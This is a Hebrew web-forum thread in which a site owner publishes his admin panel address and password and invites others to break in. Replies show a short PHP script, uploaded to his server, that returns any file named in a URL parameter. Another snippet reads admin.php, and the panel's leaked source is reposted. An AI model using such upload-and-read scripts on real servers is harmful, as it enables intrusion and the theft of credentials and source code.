[x-ray]

בהמשך לאשכול הקודם(http://www.hosts.co.il/forums/showthread.php?t=25673) על הקוד שלקחו לי החלטתי לפרסם את הכתובת למערכת פה,
מי שמצלי לפרוץ או להוריד משהו למחשב שו שיגיד לי איך לעזאזל עושים דבר כזה ואיך מונעים את זה!

http://www.d-arena.com/bla/admin.php
סיסמא 123

[lalamen]

פרצתי לך את המערכת בשניות ואני יודע את השם של המסד

arena_cms

וגם את הסיסמא

[x-ray]

מה?
איך עשית את זה?
אפשר לדבר איתך בפרטי?

[lalamen]

העליתי קובץ עם הקוד הבא:

PHP קוד:

<?php
$file = $_GET['file'];
header ("Content-type: application/x-php");
header ("Content-disposition: attachment; filename=".$file.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>

[x-ray]

ציטוט:

נכתב במקור על ידי lalamen

העליתי קובץ עם הקוד הבא:

PHP קוד:

<?php
$file = $_GET['file'];
header ("Content-type: application/x-php");
header ("Content-disposition: attachment; filename=".$file.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>

אהה זה היה לפני שחסמתי העלאת קבציםשל PHP...עכשיו זה חסום כבר..תנסה שוב אני אל חושב שתצליח..

---ערכיה---

מי שעדיין מצליח להעלות קבצי PHP זה כי הוא עדיין מופנה לDNS הישן...
אני לא יכול לשנות שם כבר את הקבצים אין יל גישה יותר.

[CSite.co.il]

הנה עוד חלק מהקוד שלך:

PHP קוד:

<?php

$file = "../admin.php";

$file = file_get_contents($file);

echo htmlspecialchars($file);

?>

[Eye-Soft]

<?php ob_start(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1255" />
<title>פאנל ניהול פלייבקים</title>
<style type="text/css">
<!--
input {
border: 1px solid black; font-family: Arial;color:black; background-color: white;
}
body,table {
font-family: Arial, Helvetica, sans-serif;

color: #000000;
text-decoration: none;

}

-->
</style>


<script language=JavaScript>
function openWin(my_var) {
window.open(my_var,'CatDelete','menubar=no,resizab le=no,scrollbars=yes,width=600,height=400');
}
</script>


</head>

<body>
<br><br>
<center><font size="3">
<table dir="rtl" width="100%"><tr bgcolor="#F0F0F0"><td><a href="admin.php">ניהול ראשי</a> | <a href="javascript: openWin('admin.php?act=add')">הוסף פלייבק</a> | <a href="javascript: openWin('admin.php?act=search')">חפש פלייבק</a> | <a href="admin.php?act=showheb">הצג קטגוריה עברי</a> | <a href="admin.php?act=showen">הצג קטגוריה לועזי</a></td></tr></table></font>

<?php


session_start();
if($_SESSION['admin']=='true'){
include 'db.php';
$act=$_GET['act'];
switch($act) {
case "view":
include 'act/view.php';
break;
case "add":
include 'act/add.php';
break;
case "showheb":
include 'act/showheb.php';
break;
case "showen":
include 'act/showen.php';
break;
case "deletesong":
include 'act/deletesong.php';
break;
case "search":
include 'act/search.php';
break;
case "editsong":
include 'act/editsong.php';
break;
case "mail":
include 'act/mail.php';
break;
default:
header("Location: admin.php?act=view");
break;

}
}else header('Location: login.php');
?>
</center>
</body>
</html>

תעשה לי טובה, תגיד לי שאתה לא מרוויח כסף מתיכנות, כי זה רוע ללקוחות.

[TheShark]

ציטוט:

נכתב במקור על ידי lalamen

העליתי קובץ עם הקוד הבא:

PHP קוד:

<?php
$file = $_GET['file'];
header ("Content-type: application/x-php");
header ("Content-disposition: attachment; filename=".$file.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>

אפשר לשאול שאלה?
אז העלת את הקובץ הזה לשרת שלו...

מה עכשיו אתה עושה אחרי שהעלת את הקובץ?
אתה נכנס לאיו דרך הכתובת ואז מה קורה?
אשמח אם תענה לי בפה או בפרטי... בבקשה

יום טוב.

[x-ray]

ציטוט:

נכתב במקור על ידי Eye-Soft

<?php ob_start(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1255" />
<title>פאנל ניהול פלייבקים</title>
<style type="text/css">
<!--
input {
border: 1px solid black; font-family: Arial;color:black; background-color: white;
}
body,table {
font-family: Arial, Helvetica, sans-serif;

אני אומר לך שוב,אם אתה מצליח להעלות קבצי PHP לשרת זה רק כי לא התעדכן לך הDNS ולשרת השני כבר אין לי גישה.

color: #000000;
text-decoration: none;

}

-->
</style>


<script language=JavaScript>
function openWin(my_var) {
window.open(my_var,'CatDelete','menubar=no,resizab le=no,scrollbars=yes,width=600,height=400');
}
</script>


</head>

<body>
<br><br>
<center><font size="3">
<table dir="rtl" width="100%"><tr bgcolor="#F0F0F0"><td><a href="admin.php">ניהול ראשי</a> | <a href="javascript: openWin('admin.php?act=add')">הוסף פלייבק</a> | <a href="javascript: openWin('admin.php?act=search')">חפש פלייבק</a> | <a href="admin.php?act=showheb">הצג קטגוריה עברי</a> | <a href="admin.php?act=showen">הצג קטגוריה לועזי</a></td></tr></table></font>

<?php


session_start();
if($_SESSION['admin']=='true'){
include 'db.php';
$act=$_GET['act'];
switch($act) {
case "view":
include 'act/view.php';
break;
case "add":
include 'act/add.php';
break;
case "showheb":
include 'act/showheb.php';
break;
case "showen":
include 'act/showen.php';
break;
case "deletesong":
include 'act/deletesong.php';
break;
case "search":
include 'act/search.php';
break;
case "editsong":
include 'act/editsong.php';
break;
case "mail":
include 'act/mail.php';
break;
default:
header("Location: admin.php?act=view");
break;

}
}else header('Location: login.php');
?>
</center>
</body>
</html>

תעשה לי טובה, תגיד לי שאתה לא מרוויח כסף מתיכנות, כי זה רוע ללקוחות.

אני אומר לך שוב,אם אצלחת להעלות קובץ PHP זה רק כי לא התעדכן לך הDNS עדיין ואין לי גישה לשרת השני לחסום של העלאת קבצי PHP.

אם הצלחת בדרך אחרת אני אשמח לדעת איך.

[Eye-Soft]

לא העלתי שום קובץ. המערכת שלך היא אחת המערכות הפריצות והבנויית בצורה הטיפשית שראיתי :\
עניתי לך על איך באשכול הקודם...